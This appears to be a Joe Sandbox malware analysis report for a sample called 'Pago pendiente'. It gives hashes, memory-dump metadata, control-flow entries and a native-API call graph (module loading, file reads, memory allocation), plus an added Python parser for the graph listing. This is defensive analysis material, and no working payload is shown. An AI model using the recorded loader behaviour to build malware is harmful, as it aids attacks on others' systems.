                                                          • Opcode ID: 20566448163b78847f11564f5dfedf2ffcf0bc62a478cdc79275eb1de9930396
                                                          • Instruction ID: d08a62ed60c5199b48dc7b5eaff7b33b3a69ac9a0cb9d441542d3518b9454c6d
                                                          • Opcode Fuzzy Hash: 20566448163b78847f11564f5dfedf2ffcf0bc62a478cdc79275eb1de9930396
                                                          • Instruction Fuzzy Hash: 53F062764043849AE7218F19CD88B66FFD8EB52734F18C55AED484A286C2799944CAB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 948bff76123a3d2ea7e43212f5a2d8831b0aa7dce01679a4ce67b79dfd104436
                                                          • Instruction ID: 12004615486243ffb1607355c6aad19d6031849ebac451871883c8fb19663ed4
                                                          • Opcode Fuzzy Hash: 948bff76123a3d2ea7e43212f5a2d8831b0aa7dce01679a4ce67b79dfd104436
                                                          • Instruction Fuzzy Hash: B401AF78A00208AFCB44DFA9C588A9DBFF1AF48310F15C0A5E8489B361EA30EA40CF41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Instruction ID: 3e77e653ffb702a8809cc95bbdd83d174e8c0b24057aae57f547f09c6b5b10b6
                                                          • Opcode Fuzzy Hash: 5daf667086d8794401af825267b21e3d467d2de360e69ed419c3ce1e992bd15e
                                                          • Instruction Fuzzy Hash: 11C1DDB08227568BD710CF68F98E1897FB1BB85318F51C709E1626B2E4DFB4154AEF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9762cd0a40e5ae959fafdb33441cacf4a3c7dba03d5839045720feb6a2e3f864
                                                          • Instruction ID: 4bd61a8f24e4366ba931c5e171db02d6a4ee46ff79081e1b694e09366b956dd0
                                                          • Opcode Fuzzy Hash: 9762cd0a40e5ae959fafdb33441cacf4a3c7dba03d5839045720feb6a2e3f864
                                                          • Instruction Fuzzy Hash: 35811574E1021ACFCB44CFA9C68499EBBF1FF89354F14956AD515AB320D330AA42CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78fa769cd633cf6523a825a3f720e4f52347274884ddb8b1d5e16d547c7f2325
                                                          • Instruction ID: b40a96f0419d25a16a06150724431f9db2ae6970a9a4f2dd360c5c0c14608a6f
                                                          • Opcode Fuzzy Hash: 78fa769cd633cf6523a825a3f720e4f52347274884ddb8b1d5e16d547c7f2325
                                                          • Instruction Fuzzy Hash: B981E0B4E1121ACFCB44CFA9C68499EBBF1FF89350F149569D515AB320D330AA42CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab9959d6dc6c99c3a5837bd08aef2f7df84a71363033378d6e3fbcc21950068d
                                                          • Instruction ID: 1a7d82375479f2ccd5341fca7cfca62c9ab8e2ab5ceb2cc3ced0b5d59797bdfe
                                                          • Opcode Fuzzy Hash: ab9959d6dc6c99c3a5837bd08aef2f7df84a71363033378d6e3fbcc21950068d
                                                          • Instruction Fuzzy Hash: AB7146B4E1521ADFCB04CF99D4809AEFBB2FF89350F109466E421AB355C3749A52DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23f89d01db051188bfd7a2ffcea408362d0d9f6b1e18c238cdad3cbd02751197
                                                          • Instruction ID: c5ee1e5dfd8d447aa6df7ac2a35bdb860815d6f638ced5e77c1b6e1331482d1d
                                                          • Opcode Fuzzy Hash: 23f89d01db051188bfd7a2ffcea408362d0d9f6b1e18c238cdad3cbd02751197
                                                          • Instruction Fuzzy Hash: 266147B4E1421ADFCB04CF99D0809AEFBB2FF89350F149466E811AB255D3349A52DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 091da4d51517f6106c1be168dd264d20b2b076246d5cabb56defb2964ec2cbb0
                                                          • Instruction ID: 56190c707381f6d8efc9bcec6ceeef86177511026dbe94a25c0369659ad16ae0
                                                          • Opcode Fuzzy Hash: 091da4d51517f6106c1be168dd264d20b2b076246d5cabb56defb2964ec2cbb0
                                                          • Instruction Fuzzy Hash: 9A6144B0935659EFCB00CF52F586059BFB1FBCA380F14D4D9D0E49A144DB7A5662C70A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f3974377b07b1784733e5d150d3f256f2be1fa6194e730aa1ef5c75539401c8
                                                          • Instruction ID: f626d242621bf532528188fb922925aecb843ea3f2691f8c2c5d190ea7233193
                                                          • Opcode Fuzzy Hash: 4f3974377b07b1784733e5d150d3f256f2be1fa6194e730aa1ef5c75539401c8
                                                          • Instruction Fuzzy Hash: B361F5B0E1521ADFCB04CFAAC5815EEFBB2FF49340F14845AD525A7204D3359A829F96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5dd49d652e77c766bcc9948e298c69344eda2a64872b07dee82569cec4043d87
                                                          • Instruction ID: 113462217bdcb43db0528d8997dcd8e0bf87f0771cdfa2a7079a6b24b8b236d9
                                                          • Opcode Fuzzy Hash: 5dd49d652e77c766bcc9948e298c69344eda2a64872b07dee82569cec4043d87
                                                          • Instruction Fuzzy Hash: 1B5129B1E1421ADFCB04CFAAC5815AEFBB2FF45340F14C426D425A7244D3359A82DF96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1185dff62beb8ffad8b65a473bdd02f5f895b3f6b805e023f1b46e50aff8976
                                                          • Instruction ID: 6fe60aec922e42f1c2618a395fe4911d34ad738a5c4b3a409cd29cf4d84a3b3c
                                                          • Opcode Fuzzy Hash: a1185dff62beb8ffad8b65a473bdd02f5f895b3f6b805e023f1b46e50aff8976
                                                          • Instruction Fuzzy Hash: 025159B0E1521A9FCB04CFA6D8455AEFBF2FF89300F20D42AE815B7254EB345A428F54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b5937dd57f3065ac14fe04baf86ff9ca818e259eafffb76285afdedcfe64165
                                                          • Instruction ID: f469b71d0f95f09af7d6cf540b25b5a600e34d7d1ff30fdd80ac19c4324a0514
                                                          • Opcode Fuzzy Hash: 1b5937dd57f3065ac14fe04baf86ff9ca818e259eafffb76285afdedcfe64165
                                                          • Instruction Fuzzy Hash: B1514AB0E1521A9FCB04CFA6D8455AEFBF2FF89340F24D42AE411B7254EB345A428F54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47a3aa8326657474d474b1b2b4c67b832ed5188930a3b402e4a090880b09ab0f
                                                          • Instruction ID: 0da1b19ff91d5e78854cb58a26563a9fe50e71c1c474b2c2609b6a58db78f6f0
                                                          • Opcode Fuzzy Hash: 47a3aa8326657474d474b1b2b4c67b832ed5188930a3b402e4a090880b09ab0f
                                                          • Instruction Fuzzy Hash: 76511DB0E056198FDB14CFA9C5849AEFBF2FF89304F24816AD818A7315D7349941CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 17255d7ddaa0427ad5aaf4bffe693f7f740188a5c3a1d4f327fa8d8481040c5b
                                                          • Instruction ID: d4e0e0cc670ecbc4be16d451f5ecafac93e06577f81f92746dac7658c6ff8d8d
                                                          • Opcode Fuzzy Hash: 17255d7ddaa0427ad5aaf4bffe693f7f740188a5c3a1d4f327fa8d8481040c5b
                                                          • Instruction Fuzzy Hash: 944138B0D0021ACFCB04CFAAC4815AEFBF2FF89250F24C06AD565E7214D735A6428F56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e273c86cb28fa1067b923a303893e6d576408a8ab01afc02c8713c04f93f322
                                                          • Instruction ID: 4e4709d4a4201a2d96ed6f1b60e9171f1fa10d9c9c7b6dc0a9c150b3db79fa86
                                                          • Opcode Fuzzy Hash: 3e273c86cb28fa1067b923a303893e6d576408a8ab01afc02c8713c04f93f322
                                                          • Instruction Fuzzy Hash: 3F41E7B0D0121ADFCB44CFAAC4815AEFBF2FF89240F24D16AC565B7214D735AA428F55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: T+-q$[V~*$[V~*$]\`
                                                          • API String ID: 0-1849991408
                                                          • Opcode ID: 598118bb9945c9a374f83e464f9e0b753688a82d25dc9a8adf1c1e9ae701e6be
                                                          • Instruction ID: 8bbc978fbac7fe085334133df54044b939bebdbf5ab79d6b1af385c2c51e0df1
                                                          • Opcode Fuzzy Hash: 598118bb9945c9a374f83e464f9e0b753688a82d25dc9a8adf1c1e9ae701e6be
                                                          • Instruction Fuzzy Hash: F22193B1E106598FDB48CFABC94469EFBF3BF89300F14C12AD818AB258DB7459428F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:1.4%
                                                          Dynamic/Decrypted Code Coverage:2.7%
                                                          Signature Coverage:5.8%
                                                          Total number of Nodes:555
                                                          Total number of Limit Nodes:64
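The execution_graph listing under this heading is the text export of Joe Sandbox's interactive call graph: a flat token stream in which "<id> <address> [annotation...]" declares a node and "<id>-><id>" is a caller/callee edge. The annotation is either the Win32/Nt API names the analyzer saw at that call site or a collapsed "N API calls" summary, and the token after an id is always the address (so decimal-looking addresses such as 409620 are not ids). The following Python is an added example, not Joe Sandbox code, that parses that stream, merges the per-call-site nodes back to function addresses, and computes which APIs are reachable from the entry node. The SAMPLE is a constructed excerpt of tokens from this report's listing with intermediate nodes removed, so its edges do not reproduce the page's graph exactly; the function and variable names are the example's own.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the tokens from the execution_graph listing in
# this report, with intermediate nodes dropped so the excerpt stays short. The
# edges therefore do not reproduce the page's graph exactly.
SAMPLE = """
execution_graph 100035 41f0f0 100038 41b970 100035->100038 100039 41b996 100038->100039
100044 41b9b5 100039->100044 100090 41a6b0 100044->100090 100091 41af60 LdrLoadDll 100090->100091
100092 41a6cf ExitProcess 100091->100092 100359 41ad70 100044->100359 100464 41ac30 100359->100464
100465 41ac4b 100464->100465 100466 414e50 LdrLoadDll 100465->100466 100444 41a540 100359->100444
100445 41af60 LdrLoadDll 100444->100445 100446 41a55c NtAllocateVirtualMemory 100445->100446
100069 41bdc0 2 API calls 100044->100069
"""

ID_RE = re.compile(r"^\d{6}$")                 # node ids are six-digit counters (100035, ...)
EDGE_RE = re.compile(r"^(\d{6})->(\d{6})$")    # caller->callee
COUNT_RE = re.compile(r"^\d+ API calls$")      # collapsed-subgraph summary, not an API name


def parse_execution_graph(text):
    """Parse the flattened token stream into (nodes, edges).

    nodes: id -> {"addr": hex string, "apis": [API names annotated on that node]}
    edges: list of (src_id, dst_id)
    The token right after an id is always the address; annotation tokens run
    until the next id or edge token.
    """
    nodes, edges = {}, []
    current, expect_addr, pending = None, False, []

    def flush():
        nonlocal pending
        if current is not None and current in nodes:  # guard: stream may be cut off after an id
            label = " ".join(pending)
            nodes[current]["apis"] = [] if (not label or COUNT_RE.match(label)) else pending
        pending = []

    for tok in text.split():
        if expect_addr:
            nodes[current] = {"addr": tok.lower(), "apis": []}
            expect_addr = False
            continue
        edge = EDGE_RE.match(tok)
        if edge:
            flush()
            current = None
            edges.append((edge.group(1), edge.group(2)))
        elif ID_RE.match(tok):
            flush()
            current, expect_addr = tok, True
        elif current is not None:
            pending.append(tok)
        # Anything else (the leading "execution_graph" label) is ignored.
    flush()
    return nodes, edges


def reachable_apis(nodes, edges, start):
    """Set of API names on every node reachable from `start` (depth-first).

    On a truncated listing this is a lower bound: edges cut off the page are
    simply absent from the graph.
    """
    adj = defaultdict(list)
    for src, dst in edges:
        adj[src].append(dst)
    seen, stack, apis = set(), [start], set()
    while stack:
        node = stack.pop()
        if node in seen:
            continue
        seen.add(node)
        apis.update(nodes.get(node, {}).get("apis", []))
        stack.extend(adj[node])
    return apis


def apis_by_address(nodes):
    """Merge per-call-site nodes: function address -> sorted list of API names."""
    merged = defaultdict(set)
    for info in nodes.values():
        merged[info["addr"]].update(info["apis"])
    return {addr: sorted(apis) for addr, apis in merged.items() if apis}


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE)
    print(len(nodes), "nodes,", len(edges), "edges")
    print("reachable from 41f0f0:", sorted(reachable_apis(nodes, edges, "100035")))
    for addr, apis in sorted(apis_by_address(nodes).items()):
        print(addr, apis)
```

Run against the full listing (copied out of the report as one string), the address-level merge is what you want for pivoting into the disassembly: the many 0x41af60 and 0x41ac30 call sites collapse to one LdrLoadDll stub each, and a "N API calls" node stays empty rather than being mistaken for an API named "API". Because the page's listing is cut off, treat the reachable set as a lower bound.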
execution_graph (node/edge listing of the interactive graph; the raw node-id tokens and edge pairs are omitted here, and the listing is cut off on this page)
• Entry node: 0x41f0f0
• 0x41ad70 calls 0x41ac30 (LdrLoadDll) from several dozen consecutive call sites in one straight chain
• LdrLoadDll: 0x41af60, 0x41ac30, 0x414e50, 0x409620, 0x41b5a0, 0x4152d0, 0x41a460, 0x41af00, 0x41a320, 0x41a2a0, 0x40ad50, 0x419c90
• NtCreateFile: 0x41a37c
• NtReadFile: 0x41a42c; LdrLoadDll + NtReadFile + NtClose: 0x414790
• NtClose: 0x41a4ac; LdrLoadDll + NtClose + LdrInitializeThunk: 0x414650
• NtAllocateVirtualMemory: 0x41a55c
• RtlAllocateHeap: 0x41a64c; LdrLoadDll + RtlAllocateHeap: 0x41bfd0
• RtlFreeHeap: 0x41a68c; LdrLoadDll + RtlFreeHeap: 0x41cf90; LdrLoadDll + RtlAllocateHeap + RtlFreeHeap: 0x41cfd0
• LdrInitializeThunk: 0x1472c1f, 0x1472c70, 0x1472df0
• ExitProcess: 0x41a6cf
• Collapsed subgraphs shown only as "N API calls": 0x41bdc0 (2), 0x41a010 (2), 0x41a490 (2), 0x41a6b0 (2), 0x41bd40 (2), 0x41a5c0 (2), 0x41cf30 (2), 0x419ec0 (2), 0x41bf90 (2), 0x40f4a0 (3), 0x41d060 (3), 0x414070 (3), 0x414a50 (8)
LdrLoadDll 100511->100512 100513 40f1bb 100512->100513 100513->100123 100514 41a7d0 100513->100514 100515 41af60 LdrLoadDll 100514->100515 100516 41a7ef LookupPrivilegeValueW 100515->100516 100516->100119 100518 41af60 LdrLoadDll 100517->100518 100519 41a27c 100518->100519 100523 1472ea0 LdrInitializeThunk 100519->100523 100520 41a29b 100520->100122 100522->100508 100523->100520 100525 40b1f0 100524->100525 100526 40b040 LdrLoadDll 100525->100526 100527 40b204 100526->100527 100527->100057 100529 40ae51 100528->100529 100530 40ae4d 100528->100530 100531 40ae6a 100529->100531 100532 40ae9c 100529->100532 100530->100059 100575 419cd0 LdrLoadDll 100531->100575 100576 419cd0 LdrLoadDll 100532->100576 100534 40aead 100534->100059 100536 40ae8c 100536->100059 100538 40f4a0 3 API calls 100537->100538 100539 4143c6 100537->100539 100538->100539 100539->100061 100577 4087a0 100540->100577 100543 4087a0 19 API calls 100544 408a8a 100543->100544 100546 408a9d 100544->100546 100595 40f710 10 API calls 100544->100595 100546->100063 100548 41af60 LdrLoadDll 100547->100548 100549 41a51c 100548->100549 100714 1472e80 LdrInitializeThunk 100549->100714 100550 40c322 100552 40f4a0 100550->100552 100553 40f4bd 100552->100553 100715 419fc0 100553->100715 100556 40f505 100556->100067 100557 41a010 2 API calls 100558 40f52e 100557->100558 100558->100067 100560 41af60 LdrLoadDll 100559->100560 100561 41a02c 100560->100561 100721 1472d10 LdrInitializeThunk 100561->100721 100562 40c385 100562->100073 100562->100076 100565 41af60 LdrLoadDll 100564->100565 100566 41a07c 100565->100566 100722 1472d30 LdrInitializeThunk 100566->100722 100567 40c459 100567->100084 100570 419e35 100569->100570 100571 41af60 LdrLoadDll 100570->100571 100572 419e3c 100571->100572 100723 1472fb0 LdrInitializeThunk 100572->100723 100573 40c4ac 100573->100088 100575->100536 100576->100534 100578 407ea0 4 API calls 100577->100578 100593 4087ba 100578->100593 100579 408a49 100579->100543 100579->100546 100580 408a3f 
100581 408160 2 API calls 100580->100581 100581->100579 100584 419f00 2 API calls 100584->100593 100586 41a490 LdrLoadDll NtClose 100586->100593 100589 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100589->100593 100592 419e20 2 API calls 100592->100593 100593->100579 100593->100580 100593->100584 100593->100586 100593->100589 100593->100592 100596 419d10 100593->100596 100599 4085d0 100593->100599 100611 40f5f0 LdrLoadDll NtClose 100593->100611 100612 419d90 LdrLoadDll 100593->100612 100613 419dc0 LdrLoadDll 100593->100613 100614 419e50 LdrLoadDll 100593->100614 100615 4083a0 100593->100615 100631 405f60 LdrLoadDll 100593->100631 100595->100546 100597 419d2c 100596->100597 100598 41af60 LdrLoadDll 100596->100598 100597->100593 100598->100597 100600 4085e6 100599->100600 100632 419880 100600->100632 100602 408771 100602->100593 100603 4085ff 100603->100602 100653 4081a0 100603->100653 100605 4086e5 100605->100602 100606 4083a0 11 API calls 100605->100606 100607 408713 100606->100607 100607->100602 100608 419f00 2 API calls 100607->100608 100609 408748 100608->100609 100609->100602 100610 41a500 2 API calls 100609->100610 100610->100602 100611->100593 100612->100593 100613->100593 100614->100593 100616 4083c9 100615->100616 100693 408310 100616->100693 100619 4083dc 100620 41a500 2 API calls 100619->100620 100621 408467 100619->100621 100624 408462 100619->100624 100701 40f670 100619->100701 100620->100619 100621->100593 100622 41a490 2 API calls 100623 40849a 100622->100623 100623->100621 100625 419d10 LdrLoadDll 100623->100625 100624->100622 100626 4084ff 100625->100626 100626->100621 100705 419d50 100626->100705 100628 408563 100628->100621 100629 414a50 8 API calls 100628->100629 100630 4085b8 100629->100630 100630->100593 100631->100593 100633 41bf90 2 API calls 100632->100633 100634 419897 100633->100634 100660 409310 100634->100660 100636 4198b2 100637 4198f0 100636->100637 100638 4198d9 100636->100638 100640 41bd40 2 API 
calls 100637->100640 100639 41bdc0 2 API calls 100638->100639 100641 4198e6 100639->100641 100642 41992a 100640->100642 100641->100603 100643 41bd40 2 API calls 100642->100643 100646 419943 100643->100646 100650 419be4 100646->100650 100666 41bd80 100646->100666 100647 419bd0 100648 41bdc0 2 API calls 100647->100648 100649 419bda 100648->100649 100649->100603 100651 41bdc0 2 API calls 100650->100651 100652 419c39 100651->100652 100652->100603 100654 40829f 100653->100654 100655 4081b5 100653->100655 100654->100605 100655->100654 100656 414a50 8 API calls 100655->100656 100658 408222 100656->100658 100657 408249 100657->100605 100658->100657 100659 41bdc0 2 API calls 100658->100659 100659->100657 100661 409335 100660->100661 100662 40acf0 LdrLoadDll 100661->100662 100663 409368 100662->100663 100665 40938d 100663->100665 100669 40cf20 100663->100669 100665->100636 100687 41a580 100666->100687 100670 40cf2c 100669->100670 100671 41a1e0 LdrLoadDll 100670->100671 100672 40cf65 100671->100672 100673 40cf6c 100672->100673 100680 41a220 100672->100680 100673->100665 100677 40cfa7 100678 41a490 2 API calls 100677->100678 100679 40cfca 100678->100679 100679->100665 100681 41a23c 100680->100681 100682 41af60 LdrLoadDll 100680->100682 100686 1472ca0 LdrInitializeThunk 100681->100686 100682->100681 100683 40cf8f 100683->100673 100685 41a810 LdrLoadDll 100683->100685 100685->100677 100686->100683 100688 41af60 LdrLoadDll 100687->100688 100689 41a59c 100688->100689 100692 1472f90 LdrInitializeThunk 100689->100692 100690 419bc9 100690->100647 100690->100650 100692->100690 100694 408328 100693->100694 100695 40acf0 LdrLoadDll 100694->100695 100696 408343 100695->100696 100697 414e50 LdrLoadDll 100696->100697 100698 408353 100697->100698 100699 40835c PostThreadMessageW 100698->100699 100700 408370 100698->100700 100699->100700 100700->100619 100702 40f683 100701->100702 100708 419e90 100702->100708 100706 41af60 LdrLoadDll 100705->100706 100707 419d6c 100706->100707 100707->100628 
100709 41af60 LdrLoadDll 100708->100709 100710 419eac 100709->100710 100713 1472dd0 LdrInitializeThunk 100710->100713 100711 40f6ae 100711->100619 100713->100711 100714->100550 100716 41af60 LdrLoadDll 100715->100716 100717 419fdc 100716->100717 100720 1472f30 LdrInitializeThunk 100717->100720 100718 40f4fe 100718->100556 100718->100557 100720->100718 100721->100562 100722->100567 100723->100573 100725 1472ad0 LdrInitializeThunk

                                                          Control-flow Graph

                                                          control_flow_graph 0 41a410-41a459 call 41af60 NtReadFile
                                                          APIs
                                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: 1JA$rMA$rMA
                                                          • API String ID: 2738559852-782607585
                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 231 40acf0-40ad19 call 41cc50 234 40ad1b-40ad1e 231->234 235 40ad1f-40ad2d call 41d070 231->235 238 40ad3d-40ad4e call 41b4a0 235->238 239 40ad2f-40ad3a call 41d2f0 235->239 244 40ad50-40ad64 LdrLoadDll 238->244 245 40ad67-40ad6a 238->245 239->238 244->245
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 246 41a35a-41a3b1 call 41af60 NtCreateFile
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 519356f8128ead4ab6967f9f834b5cc5c27a6b5187eb98d1fc20d80f3b898423
                                                          • Instruction ID: db9765c572d52390fb8604434ff9c67f718cda35ab6f8ca037d898e886166646
                                                          • Opcode Fuzzy Hash: 519356f8128ead4ab6967f9f834b5cc5c27a6b5187eb98d1fc20d80f3b898423
                                                          • Instruction Fuzzy Hash: 3601B2B2605218AFCB18CF89DC85EEB77ADEF8C754F158248FA0D97241C630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 249 41a360-41a376 250 41a37c-41a3b1 NtCreateFile 249->250 251 41a377 call 41af60 249->251 251->250
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                          Memory Dump Source
